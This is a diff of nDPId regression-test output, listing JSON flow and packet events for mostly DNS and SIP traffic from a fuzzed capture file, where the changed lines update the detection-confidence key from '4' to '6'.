-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470066293,"flow_last_seen":1120470075303,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267920,"flow_last_seen":1120470267920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1120470267920,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470267920,"pkt":"ADBUADRWAODtAW69CABFAABEatoAAIARTHvAqAECwKgBAQrPADUAMGzyt\/0AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267920,"flow_last_seen":1120470267920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267920,"flow_last_seen":1120470267920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1120470267922,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470267922,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cs8AR09ueP2AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAAC1Bsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":345,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470267922,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":345,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470267922,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1120470267925,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470267925,"pkt":"ADBUADRWAODtAW69CABFAABIatwAAIARTHXAqAECwKgBAQrQADUANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":350,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470268921} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":350,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470268180,"pkt":"ADBUADRWAODtAW69CABFAGhIat4AAIARTHPAqAECwKgBAQrQADUANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1120470270925,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470270925,"pkt":"ADBUADRWAODtAW69CABFAABIat8AAIARTHLAqAECwKgBAYrQADUANDb28v4BAAABwwAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470272927,"flow_last_seen":1120470272927,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470272927,"l3_proto":"ip4","src_ip":"94.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":4,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1120470272927,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470272927,"pkt":"ADBUADRWAODtAW69CABFAABIauAAAIARTHFeqAECwKgBAQrQAAQANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1120470276933,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470276933,"pkt":"ADBUADRWAODtAW69CABFAABIauEAAIARTHDAqAECwKgBAQrQADUANDb28v4BALIBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267925,"flow_last_seen":1120470276933,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":200000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267925,"flow_last_seen":1120470276933,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":200000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470083310,"flow_last_seen":1120470088311,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 